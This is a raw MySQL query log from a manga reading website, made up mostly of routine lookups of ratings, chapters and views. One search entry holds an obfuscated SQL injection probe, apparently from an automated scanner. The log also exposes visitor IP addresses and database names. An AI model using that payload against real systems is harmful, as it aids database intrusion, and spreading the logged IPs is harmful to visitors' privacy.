330643598 Quit 330643599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330643599 Quit 330643600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330643600 Quit 330643601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330643601 Quit 330643602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330643602 Quit 330643603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330643603 Quit 330643604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330643604 Quit 330643605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330643605 Quit 330643606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330643606 Quit 330643607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330643607 Quit 330643608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330643608 Quit 330643609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330643609 Quit 330643610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330643610 Quit 330643611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330643611 Quit 330643612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330643612 Quit 330643613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330643613 Quit 330643614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330643614 Quit 330643615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330643615 Quit 330643616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330643616 Quit 330643617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330643617 Quit 330643618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330643618 Quit 330643619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330643619 Quit 330643620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330643620 Quit 330643621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330643621 Quit 330643622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330643622 Quit 330643623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330643623 Quit 330643624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330643624 Quit 330643625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330643625 Quit 330643626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330643626 Quit 330643627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330643627 Quit 330643628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330643628 Quit 330643629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330643629 Quit 330643630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330643630 Quit 330643631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330643631 Quit 330643632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330643632 Quit 330643633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330643633 Quit 330643634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330643634 Quit 330643635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330643635 Quit 330643636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330643636 Quit 330643637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330643637 Quit 330643638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330643638 Quit 330643639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330643639 Quit 330643640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330643640 Quit 330643641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330643641 Quit 330643642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330643642 Quit 330643643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330643643 Quit 330643644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330643644 Quit 330643645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330643645 Quit 330643646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330643646 Quit 330643647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330643647 Quit 330643648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330643648 Quit 330643649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330643649 Quit 330643650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330643650 Quit 330643651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330643651 Quit 330643652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330643652 Quit 330643653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330643653 Quit 330643654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330643654 Quit 330643655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330643655 Quit 330643656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330643656 Quit 330643657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330643657 Quit 330643658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330643658 Quit 330643659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330643659 Quit 330643660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330643660 Quit 330643661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330643661 Quit 330643662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330643662 Quit 330643663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330643663 Quit 330643664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330643664 Quit 330643665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330643665 Quit 330643666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330643666 Quit 330643667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330643667 Quit 330643668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330643668 Quit 330643669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330643669 Quit 330643670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330643670 Quit 330643671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330643671 Quit 330643672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330643672 Quit 330643673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330643673 Quit 330643674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330643674 Quit 330643675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330643675 Quit 330643676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330643676 Quit 330643677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330643677 Quit 330643678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330643678 Quit 330643679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330643679 Quit 330643680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330643680 Quit 330643681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330643681 Quit 330643682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643682 Quit 330643683 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643683 Quit 330643684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643684 Quit 330643685 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15289' 330643685 Quit 330643686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643686 Query select * FROM chapters where id = '15289' 330643686 Quit 330643687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643687 Query select * FROM chapters where manga_id = '127' order by id desc 330643687 Quit 330643688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643688 Query Update chapters set view=view+1 where id = '15289' 330643688 Quit 330643689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643689 Query select * FROM chapters where id = '15289' 330643689 Quit 330643690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643690 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15289' 330643690 Quit 330643691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643691 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('127', '15289', '103.217.224.133', 'mangacherri.com', '2026-02-26 03:28:25', '2026-02-26 03:28:25') 330643691 Quit 330643692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643692 Query select * FROM chapter_images where chapter_id = '15289' 330643692 Quit 330643693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643693 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '127' and m.active = 1 330643693 Quit 330643694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643694 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='127' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330643695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643695 Quit 330643696 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16944' 330643696 Quit 330643697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643697 Query select * FROM chapters where id = '16944' 330643697 Quit 330643698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643698 Query select * FROM chapters where manga_id = '197' order by id desc 330643698 Quit 330643699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643699 Query Update chapters set view=view+1 where id = '16944' 330643699 Quit 330643700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643700 Query select * FROM chapters where id = '16944' 330643700 Quit 330643701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643701 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16944' 330643701 Quit 330643702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643702 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '16944', '2405:9800:b950:b62c:7aa3:1ee:e25c:f89a', 'mangacherri.com', '2026-02-26 03:28:25', '2026-02-26 03:28:25') 330643702 Quit 330643703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643703 Query select * FROM chapter_images where chapter_id = '16944' 330643703 Quit 330643704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643704 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330643705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643704 Quit 330643705 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 260225 19:28:26 330643694 Quit 330643706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643706 Quit 330643707 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643707 Quit 330643708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643708 Quit 330643709 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643709 Quit 330643710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643710 Quit 330643711 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643711 Quit 330643712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643712 Quit 330643713 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643713 Quit 330643705 Quit 330643714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643714 Quit 330643715 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643715 Quit 330643716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643716 Quit 330643717 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643717 Quit 330643718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643718 Quit 330643719 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643719 Quit 330643720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643720 Quit 330643721 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643721 Quit 330643722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643722 Quit 330643723 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17489' 330643723 Quit 330643724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643724 Query select * FROM chapters where id = '17489' 330643724 Quit 330643725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643725 Query select * FROM chapters where manga_id = '252' order by id desc 330643725 Quit 330643726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643726 Query Update chapters set view=view+1 where id = '17489' 330643726 Quit 330643727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643727 Query select * FROM chapters where id = '17489' 330643727 Quit 330643728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643728 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17489' 330643729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643728 Quit 330643729 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('252', '17489', '2001:4860:7:110e::da', 'mangacherri.com', '2026-02-26 03:28:26', '2026-02-26 03:28:26') 330643729 Quit 330643730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643730 Query select * FROM chapter_images where chapter_id = '17489' 330643730 Quit 330643731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643731 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '252' and m.active = 1 330643731 Quit 330643732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643732 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='252' and m.active = 1 AND (genres like '%Manhwa%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330643733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643733 Quit 330643734 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1aNd//6483(2727(SeLEct//cASE//6483//wheN//6483//tHEn//1//Else//0//eND//FRom//rDbDAtABAse)2727) OR ZQ', '169.150.196.30', '2026-02-26 03:28:26') 330643734 Quit 330643735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643735 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1aNd//6483(2727(SeLEct//cASE//6483//wheN//6483//tHEn//1//Else//0//eND//FRom//rDbDAtABAse)2727) OR ZQ%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1aNd//6483(2727(SeLEct//cASE//6483//wheN//6483//tHEn//1//Else//0//eND//FRom//rDbDAtABAse)2727) OR ZQ%' ) ) 330643735 Quit 330643736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643736 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\'aNd/**/6483=(%27~%27||(SeLEct/**/cASE/**/6483/**/wheN/**/6483/**/tHEn/**/1/**/Else/**/0/**/eND/**/FRom/**/rDb$DAtABAse)||%27~%27) OR \'ZQfL0loL\'=\'UyxYGtus' 330643736 Quit 330643737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643737 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330643737 Quit 330643738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643739 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643738 Quit 330643739 Quit 330643740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330643740 Quit 330643741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330643741 Quit 330643742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330643742 Quit 330643743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330643743 Quit 330643744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330643744 Quit 330643745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330643745 Quit 330643746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330643746 Quit 330643747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330643747 Quit 330643748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330643748 Quit 330643749 Connect mangauser@localhost on 